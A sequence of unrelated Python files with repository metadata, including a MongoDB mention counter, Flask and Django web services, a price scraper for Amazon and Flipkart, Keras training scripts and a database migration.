#Credit : https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
result = sorted(result.items(), key=lambda item: item[1],reverse=True)
#
for user in result:
result_by_limit.append(user[0])
if(len(result_by_limit) >= limit):
break
return result_by_limit
@staticmethod
def getMostMentionedAboutUsersIDByLimit(limit,ban_list):
result = {}
result_by_limit = []
for entities in MongoDBManager.entities.find():
for user in entities["user_mentions"]:
if(user["id"] not in ban_list):
if(user["id"] in result):
result[user["id"]] += 1
else:
result[user["id"]] = 1
#Credit : https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
result = sorted(result.items(), key=lambda item: item[1],reverse=True)
#
for user in result:
result_by_limit.append(user[0])
if(len(result_by_limit) >= limit):
break
return result_by_limit
@staticmethod
def insertTimelineUser(userid):
MongoDBManager.gottentimelineuser.insert_one({"userid" :userid})
@staticmethod
def getTimelineUserNumbers(filter):
return MongoDBManager.gottentimelineuser.count_documents(filter)
@staticmethod
def removeAllTimelineUser():
MongoDBManager.gottentimelineuser.delete_many({})
|
[
"17chuchu.guy@gmail.com"
] |
17chuchu.guy@gmail.com
|
e4264085a89617c4a9f1e8fa44198720face8196
|
e47264a2f227d50b20c86508d145d6c138e9b4fc
|
/app/config.py
|
1a666d0008fa97d8ddd20b0345842806ae36ebfc
|
[
"MIT"
] |
permissive
|
giantoak/tempus
|
5856e86cb5a19fb3b406fb679ef94bd9ae8b8fd1
|
f99092e350344b7dee21eeefde659a04b74e7fc6
|
refs/heads/master
| 2021-04-09T16:59:40.751826
| 2015-04-10T19:03:17
| 2015-04-10T19:03:17
| 33,481,052
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
import os
dburl = os.getenv('TEMPUS_DB_URL', '')
port = os.getenv('TEMPUS_PORT', 5000)
redisurl = os.getenv('TEMPUS_REDIS_URL', 'localhost')
# Environment variables set by Docker Compose
_opencpu_host = os.getenv('OPENCPU_1_PORT_80_TCP_ADDR', 'localhost')
_opencpu_port = os.getenv('OPENCPU_1_PORT_80_TCP_PORT', '80')
OPENCPUURL = 'http://' + _opencpu_host + ':' + _opencpu_port
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
UPLOAD_DIR = os.path.join(APP_ROOT, 'upload')
|
[
"sam.zhang@giantoak.com"
] |
sam.zhang@giantoak.com
|
e3340e2bb2c4013256a6653332f3108d9cb7307c
|
126a699598079c3a9c0a22b7fe663243239f8dcc
|
/workflows/pbt/models/tc1/tc1_runner.py
|
3a0b24b05963389df09089502cbf3197d0a62bf6
|
[
"MIT"
] |
permissive
|
andrew-weisman/Supervisor
|
d255e8edb7541c716f270a264cca123111beba81
|
9110f85c85dcc2593de68db96dbd0f433a476507
|
refs/heads/master
| 2023-01-24T21:11:41.058642
| 2020-05-08T16:10:26
| 2020-05-08T16:10:26
| 312,182,445
| 0
| 0
|
MIT
| 2020-11-24T03:33:56
| 2020-11-12T06:01:40
| null |
UTF-8
|
Python
| false
| false
| 3,148
|
py
|
# tensoflow.__init__ calls _os.path.basename(_sys.argv[0])
# so we need to create a synthetic argv.
import sys
if not hasattr(sys, 'argv'):
sys.argv = ['nt3_tc1']
import json
import os
import numpy as np
import importlib
import runner_utils
import log_tools
logger = None
def import_pkg(framework, model_name):
if framework == 'keras':
module_name = "{}_baseline_keras2".format(model_name)
pkg = importlib.import_module(module_name)
from keras import backend as K
if K.backend() == 'tensorflow' and 'NUM_INTER_THREADS' in os.environ:
import tensorflow as tf
print("Configuring tensorflow with {} inter threads and {} intra threads".
format(os.environ['NUM_INTER_THREADS'], os.environ['NUM_INTRA_THREADS']))
session_conf = tf.ConfigProto(inter_op_parallelism_threads=int(os.environ['NUM_INTER_THREADS']),
intra_op_parallelism_threads=int(os.environ['NUM_INTRA_THREADS']))
sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
K.set_session(sess)
# elif framework is 'mxnet':
# import nt3_baseline_mxnet
# pkg = nt3_baseline_keras_baseline_mxnet
# elif framework is 'neon':
# import nt3_baseline_neon
# pkg = nt3_baseline_neon
else:
raise ValueError("Invalid framework: {}".format(framework))
return pkg
def run(hyper_parameter_map, callbacks):
global logger
logger = log_tools.get_logger(logger, __name__)
framework = hyper_parameter_map['framework']
model_name = hyper_parameter_map['model_name']
pkg = import_pkg(framework, model_name)
runner_utils.format_params(hyper_parameter_map)
# params is python dictionary
params = pkg.initialize_parameters()
for k,v in hyper_parameter_map.items():
#if not k in params:
# raise Exception("Parameter '{}' not found in set of valid arguments".format(k))
params[k] = v
runner_utils.write_params(params, hyper_parameter_map)
history = pkg.run(params, callbacks)
runner_utils.keras_clear_session(framework)
# use the last validation_loss as the value to minimize
val_loss = history.history['val_loss']
result = val_loss[-1]
print("result: ", result)
return result
if __name__ == '__main__':
logger = log_tools.get_logger(logger, __name__)
logger.debug("RUN START")
param_string = sys.argv[1]
instance_directory = sys.argv[2]
model_name = sys.argv[3]
framework = sys.argv[4]
exp_id = sys.argv[5]
run_id = sys.argv[6]
benchmark_timeout = int(sys.argv[7])
hyper_parameter_map = runner_utils.init(param_string, instance_directory, framework, 'save')
hyper_parameter_map['model_name'] = model_name
hyper_parameter_map['experiment_id'] = exp_id
hyper_parameter_map['run_id'] = run_id
hyper_parameter_map['timeout'] = benchmark_timeout
# clear sys.argv so that argparse doesn't object
sys.argv = ['nt3_tc1_runner']
result = run(hyper_parameter_map)
runner_utils.write_output(result, instance_directory)
logger.debug("RUN STOP")
|
[
"ncollier@anl.gov"
] |
ncollier@anl.gov
|
d42c24042185989b69058865b037dd56543b4764
|
18a853effa699c8c6b2a83e0e1b47715c591fe2a
|
/Code/prod/restful_server.py
|
647fd701f6b6086cf8d3b54899755054d731962d
|
[] |
no_license
|
XrosLiang/intkb
|
b9ef5126ca8272d3be98f4208c65b85036a11154
|
8b627314b109e8b6f8caff9c6d2142e17238511b
|
refs/heads/main
| 2023-01-05T10:34:38.531123
| 2020-11-04T09:19:23
| 2020-11-04T09:19:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,719
|
py
|
import json
import os
from flask import Flask, request, jsonify
import time
from datetime import datetime
from kbcompleter import KBCompleter
from apis import enhanced_linker
import time
app = Flask(__name__)
kbcompleter = KBCompleter()
@app.route('/test', methods=['GET'])
def test():
return jsonify({
"message": "Success",
"time": datetime.now()
})
@app.route('/id2ans', methods=['GET'])
def get_fact():
qid = request.args.get('subject_id')
pid = request.args.get('property_id')
start_1 = time.perf_counter()
query = kbcompleter.construct_query(qid, pid)
end_1 = time.perf_counter()
start_2 = time.perf_counter()
predictions = kbcompleter.prod_predict(query)
end_2 = time.perf_counter()
top_prediction = sorted(predictions, key=lambda x:x['span_score'], reverse=True)[0]
start_3 = time.perf_counter()
objects = [] if not top_prediction['text'] else enhanced_linker(texts=[top_prediction['text']], dataset=query['property'])
end_3 = time.perf_counter()
top_prediction['object'] = objects
result = {"query": query, "prediction": top_prediction, 'time': {
'construct_query': end_1 - start_1,
'prediction': end_2 - start_2,
'linking': end_3 - start_3
}}
return jsonify(result)
@app.route('/context2ans', methods=['POST'])
def get_answer_from_context():
if request.method == 'POST':
from_post = request.get_data()
json_post = json.loads(from_post)
context, question = json_post['context'], json_post['question']
return jsonify(kbcompleter.predict(question, context))
else:
return 'POST REQUEST ONLY !'
if __name__ == '__main__':
app.run(debug=True)
|
[
"bernhard2202@gmail.com"
] |
bernhard2202@gmail.com
|
3dae3b132e8398faebe644036eb7ac6200d2c1d4
|
38c22752a95b94f66d9e7f35709ad417378cd3df
|
/home/views.py
|
ea400efa6cb486204ede4482e3a2964220d51ef6
|
[] |
no_license
|
mr-engin3er/congator
|
f71e4cd6469ef3d982a070a3dd209c15fa28931c
|
36697f3085d34d4617c6496d3c86c72eb3f2ab5d
|
refs/heads/master
| 2023-02-10T18:15:37.691607
| 2021-01-05T16:39:39
| 2021-01-05T16:39:39
| 327,058,893
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,408
|
py
|
import requests
from bs4 import BeautifulSoup
from django.shortcuts import render
from .models import Search
# Create your views here.
AMAZONE_URL = 'https://www.amazon.in/s?k={}'
FLIPKART_URL = 'https://www.flipkart.com/search?q={}'
def index(request):
return render(request, 'home/index.html')
def new_search(request):
search = request.POST.get('search')
# Search.objects.create(search=search)
def amazon(search):
FINAL_AMAZON_URL = AMAZONE_URL.format(
requests.compat.quote_plus(search))
response = requests.get(FINAL_AMAZON_URL)
soup = BeautifulSoup(response.text, features="html.parser")
search_title = soup.find_all(
'span', {'class': 'a-size-medium a-color-base a-text-normal'})
search_price = soup.find_all(
'span', {'class': 'a-price-whole'})
search_link = soup.find_all(
'a', {'class': 'a-link-normal a-text-normal'})
search_photo = soup.find_all('img', {'class': 's-image'})
amazon_title = search_title[0].text
amazon_price = search_price[0].text
amazon_url = f"https://www.amazon.in{search_link[0].get('href')}"
amazon_photo = search_photo[0].get('src')
return {'amazon_title': amazon_title,
'amazon_price': amazon_price,
'amazon_url': amazon_url,
'amazon_photo': amazon_photo}
def flipkart(search):
FINAL_FLIPKART_URL = FLIPKART_URL.format(
requests.compat.quote_plus(search))
response = requests.get(FINAL_FLIPKART_URL)
soup = BeautifulSoup(response.text, features="html.parser")
search_title = soup.find_all(
'div', {'class': '_4rR01T'})
search_price = soup.find_all(
'div', {'class': '_30jeq3 _1_WHN1'})
search_link = soup.find_all(
'a', {'class': '_1fQZEK'})
flipkart_title = search_title[0].text
flipkart_price = search_price[0].text
flipkart_url = f"https://www.flipkart.com{search_link[0].get('href')}"
return {'flipkart_title': flipkart_title,
'flipkart_price': flipkart_price,
'flipkart_url': flipkart_url}
context = {
'search': search,
}
context.update(amazon(search))
context.update(flipkart(search))
print(context)
return render(request, 'home/new_search.html', context)
|
[
"dheerajsanadhya@gmail.com"
] |
dheerajsanadhya@gmail.com
|
f23254a003f62103d9cf0c1daf2d17a5a8661d7c
|
9d25e3339c6d964769f02ffe2dcfcbd98d6588b8
|
/hul_test - Copy.py
|
72ffa9465270a247ddfe6180d1762f9cf445e10e
|
[] |
no_license
|
LimKaiZhuo/strainsensor
|
c4e4ae786b51aa0b674860b41eef04acac79b7c8
|
8307e69758c71c46e2496e2f87a844061c8e77e3
|
refs/heads/master
| 2023-01-14T16:27:16.459520
| 2020-11-17T09:49:00
| 2020-11-17T09:49:00
| 203,913,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,819
|
py
|
from keras.layers import Input, Dense, Lambda, Layer
from keras.initializers import Constant
from keras.models import Model
from keras import backend as K
import numpy as np
from own_package.features_labels_setup import load_data_to_fl
from own_package.models.models import create_hparams
# Custom loss layer
class CustomMultiLossLayer(Layer):
def __init__(self, nb_outputs=2, init_std=None, **kwargs):
self.nb_outputs = nb_outputs
self.is_placeholder = True
self.init_std = init_std
super(CustomMultiLossLayer, self).__init__(**kwargs)
def build(self, input_shape=None):
# initialise log_vars
self.log_vars = []
if self.init_std:
self.init_std = [np.log(std) for std in self.init_std]
else:
self.init_std = [0 for _ in range(self.nb_outputs)]
for i in range(self.nb_outputs):
self.log_vars += [self.add_weight(name='log_var' + str(i), shape=(1,),
initializer=Constant(self.init_std[i]), trainable=True)]
super(CustomMultiLossLayer, self).build(input_shape)
def multi_loss(self, ys_true, ys_pred):
assert len(ys_true) == self.nb_outputs and len(ys_pred) == self.nb_outputs
loss = 0
for y_true, y_pred, log_var in zip(ys_true, ys_pred, self.log_vars):
precision = K.exp(-log_var[0])
loss += K.sum(precision * (y_true - y_pred) ** 2. + log_var[0], -1)
return K.mean(loss)
def call(self, inputs):
ys_true = inputs[:self.nb_outputs]
ys_pred = inputs[self.nb_outputs:]
loss = self.multi_loss(ys_true, ys_pred)
self.add_loss(loss, inputs=inputs)
# We won't actually use the output.
return K.concatenate(inputs, -1)
sigma1 = 1e1 # ground truth
sigma2 = 1e-2 # ground truth
def gen_data(N):
X = np.random.randn(N, Q)
w1 = 2.
b1 = 8.
Y1 = X.dot(w1) + b1 + sigma1 * np.random.randn(N, D1)
w2 = 0.01
b2 = 0.03
Y2 = X.dot(w2) + b2 + sigma2 * np.random.randn(N, D2)
return X, Y1, Y2
N = 50
nb_epoch = 2000
batch_size = 20
nb_features = 10
Q = 1
D1 = 1 # first output
D2 = 1 # second output
def get_prediction_model():
inp = Input(shape=(Q,), name='inp')
x = Dense(nb_features, activation='relu')(inp)
y1_pred = Dense(10, activation='relu')(x)
y1_pred = Dense(1, activation='linear')(y1_pred)
y2_pred = Dense(10, activation='relu')(x)
y2_pred = Dense(1, activation='linear')(y2_pred)
return Model(inp, [y1_pred, y2_pred])
def get_trainable_model(prediction_model):
inp = Input(shape=(Q,), name='inp')
y1_pred, y2_pred = prediction_model(inp)
y1_true = Input(shape=(D1,), name='y1_true')
y2_true = Input(shape=(D2,), name='y2_true')
out = CustomMultiLossLayer(nb_outputs=2, init_std=None)([y1_true, y2_true, y1_pred, y2_pred])
return Model([inp, y1_true, y2_true], out)
prediction_model = get_prediction_model()
prediction_model.summary()
trainable_model = get_trainable_model(prediction_model)
trainable_model.compile(optimizer='adam', loss=None)
assert len(trainable_model.layers[-1].trainable_weights) == 2 # two log_vars, one for each output
assert len(trainable_model.losses) == 1
hparams = create_hparams(shared_layers=[30], ts_layers=[10,10,10], cs_layers=[10,10], epochs=1000,reg_l1=0.001, reg_l2=0.1,
activation='relu',batch_size=100, verbose=0)
fl = load_data_to_fl('./excel/Data_loader_test.xlsx', norm_mask=[0])
X = fl.features_c_norm
Y1 = np.copy(fl.labels[:,0])
Y2 = np.copy(fl.labels[:,1])
trainable_model.summary()
hist = trainable_model.fit([X, Y1, Y2], nb_epoch=nb_epoch, batch_size=batch_size, verbose=1)
print([np.exp(K.get_value(log_var[0]))**0.5 for log_var in trainable_model.layers[-1].log_vars])
|
[
"limkaizhuo@gmail.com"
] |
limkaizhuo@gmail.com
|
7832b91058e738847544b4d63bc17514548576df
|
52cc87565521204ad8268bc5cd3bdf8c2e7570a9
|
/4.2. Course_Gen/venv/Scripts/easy_install-3.7-script.py
|
a1b39f1d3cc2e9b08bd73095beaec04de787347f
|
[] |
no_license
|
WadeShadow/I_S_labs
|
07c2837031c84315409bb2c2bf546c84021799d0
|
69b9c0795cd9d3ec268d8ce697b3be198d450606
|
refs/heads/master
| 2022-10-05T20:38:01.227677
| 2020-05-26T21:15:30
| 2020-05-26T21:15:30
| 258,615,879
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
#!C:\Users\dsokolovrudakov\Downloads\4\gen_alg\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"worldkeeper17@gmail.com"
] |
worldkeeper17@gmail.com
|
02e7d6dd2c05cd4ab78ac45fd92c316ad971c20e
|
8b1be1876f71e71f6adc7819cea94d4b7faf4a17
|
/src/demo_poc.py
|
6e326142642176dca18735ccca82345026d4243b
|
[] |
no_license
|
MihaCim/CogloTools
|
f68528d31045c5bf020ebea143d0da9670478f82
|
43837c69a5858d6400e8d6c39dc9edb9b6ec00cf
|
refs/heads/master
| 2021-06-06T19:10:56.954538
| 2021-05-25T11:24:29
| 2021-05-25T11:24:29
| 169,245,444
| 0
| 0
| null | 2021-01-30T00:24:46
| 2019-02-05T13:27:24
|
Python
|
UTF-8
|
Python
| false
| false
| 99
|
py
|
from modules.demo.api_poc import CognitiveAdvisorAPI
server = CognitiveAdvisorAPI()
server.start()
|
[
"ensidio94@gmail.com"
] |
ensidio94@gmail.com
|
a29625c84a55b65eac5e4f9564bd2a6e23ba8bcb
|
cc493f7e3b2fcac999d9d632b394bf1e53a26026
|
/eventPlanner/migrations/0008_auto__add_attendee.py
|
ae9891070e17eff295442fad3311c6e45ad1127d
|
[] |
no_license
|
SteveKhuu/eventPlanner
|
3337c9a1e065f0e405c6f41b029b71df027db1aa
|
fb260dbdde848eaed9c0b97314162d4d39f530d3
|
refs/heads/master
| 2020-03-26T17:51:15.044870
| 2012-12-01T14:47:07
| 2012-12-01T14:47:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,389
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Attendee'
db.create_table('eventPlanner_attendee', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('event', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['eventPlanner.Events'])),
('is_managing', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('eventPlanner', ['Attendee'])
def backwards(self, orm):
# Deleting model 'Attendee'
db.delete_table('eventPlanner_attendee')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'eventPlanner.attendee': {
'Meta': {'object_name': 'Attendee'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eventPlanner.Events']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_managing': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'eventPlanner.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'eventPlanner.events': {
'Meta': {'object_name': 'Events'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eventPlanner.Category']", 'null': 'True', 'blank': 'True'}),
'created_datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'default': "'DR'", 'max_length': '2'})
},
'eventPlanner.task': {
'Meta': {'object_name': 'Task'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eventPlanner.Events']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_managing': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'target_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['eventPlanner']
|
[
"Stephen_Khuu@epam.com"
] |
Stephen_Khuu@epam.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.